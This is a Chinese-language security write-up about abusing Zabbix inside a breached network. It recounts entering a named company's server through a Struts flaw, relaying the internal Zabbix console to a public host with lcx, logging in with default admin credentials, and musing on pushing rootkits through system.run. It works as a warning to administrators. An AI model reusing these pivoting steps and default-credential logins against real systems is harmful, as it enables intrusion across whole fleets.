當滲透遇到zabbix--小談zabbix安全

0x00 背景

---

zabbix近幾年得到了各大網際網路公司的認可，其強大的功能得到了各位運維攻城獅的親耐。 公司本身也用zabbix做監控，對其屬性也有所瞭解。不得不說zabbix除了監控強大之外，還有一個很好的用處就是在你忘記root密碼的時候，重置伺服器root密碼，朋友們也一致認為zabbix是一個無比強大的超級後門。 開啟了一扇門，另外一扇門就會隨之開啟，大夥都知道zabbix有system.run模組，這是可以執行任意命令的。不過還得看agent是以什麼許可權啟的，根據我自己的觀察，大夥為了方便這個模組都會啟用，而且一般情況下都會用root跑。不用root跑會有很多麻煩事情。在這樣的情況下，某些時候不得不說也方便了方便駭客更好的到訪,這裡很多朋友都報著這樣的想法，zabbix在內網，外網訪問不了，即使有注入或弱口令或預設口令駭客也無法訪問，下面用例項來告訴你這樣的想法是錯的，不管你信不信，反正我是信了。

0x01 細節

---

出場的是tom線上 漏洞源頭

http://fm.tom.com/login-share/tomlogin/login.action struts漏洞，struts漏洞在現在看來實在太無技術含量，對於漏洞源頭，就不需解釋太多 在查詢埠的時候，agent的10050埠會與server的通訊。（在有proxy的情況下zabbix_server不太確認） 確認zabbix_server為:172.24.162.38 一般在安裝的時候會留下zabbix_agent的安裝指令碼，詳細資訊可以到指令碼里面看到 ifconfig ip資訊如下(這個是作為入侵到更多伺服器的跳板)

eth2 Link encap:Ethernet HWaddr 00:18:8B:83:1B:45 
inet addr:172.24.205.15 Bcast:172.24.205.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:81041 errors:0 dropped:0 overruns:0 frame:0
TX packets:60 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000 
Interrupt:16 Memory:f8000000-f8012800 

只有內網，首先要確認思路，在沒有外網IP的情況下，用IPtables做一個nat完全不能達到我們想要的需求，因為zabbix我們需要用IEl來訪問，只能先做內網的nat，然後把埠轉到公網的某個伺服器上去 先確認些資訊

curl http://172.24.162.38/zabbix/ #返回的是zabbix登陸頁

確認好上面的一些資訊後，接下來做一個nat

0.0.0.0 98 172.24.162.38 80

看下效果 這裡會監聽98埠，意思是當有訪問本地98埠的時候自動轉向172.24.162.38的80埠，接下來只需要將本地的98埠轉發至公網的某個伺服器就可以正常訪問了

埠轉發我用lcx(linux版)，這破玩意會經常斷，不太好用。

./lcx -m 3 -h1 youip -p1 786 -h2 127.0.0.1 -p2 98

轉發好之後就可以正常訪問了

    http://youip:port/zabbix/(這裡一定要記得加後面的/zabbix/，它本身就帶了這個目錄)

這個介面是我們想要的結果

    login:admin/zabbix (內網的zabbix大夥往往不喜歡改密碼，都認為在內網很安全)

圖截不完，下面其實還有很多。

接下來，可以有邪惡的想法了。新增一個監控項，給所有機器安裝一個rootkit？還是全部機器新增一個使用者？不要太邪惡了，只討論思路，這樣的邊界問題很容易被忽略，但是帶來的後果往往也是最大的。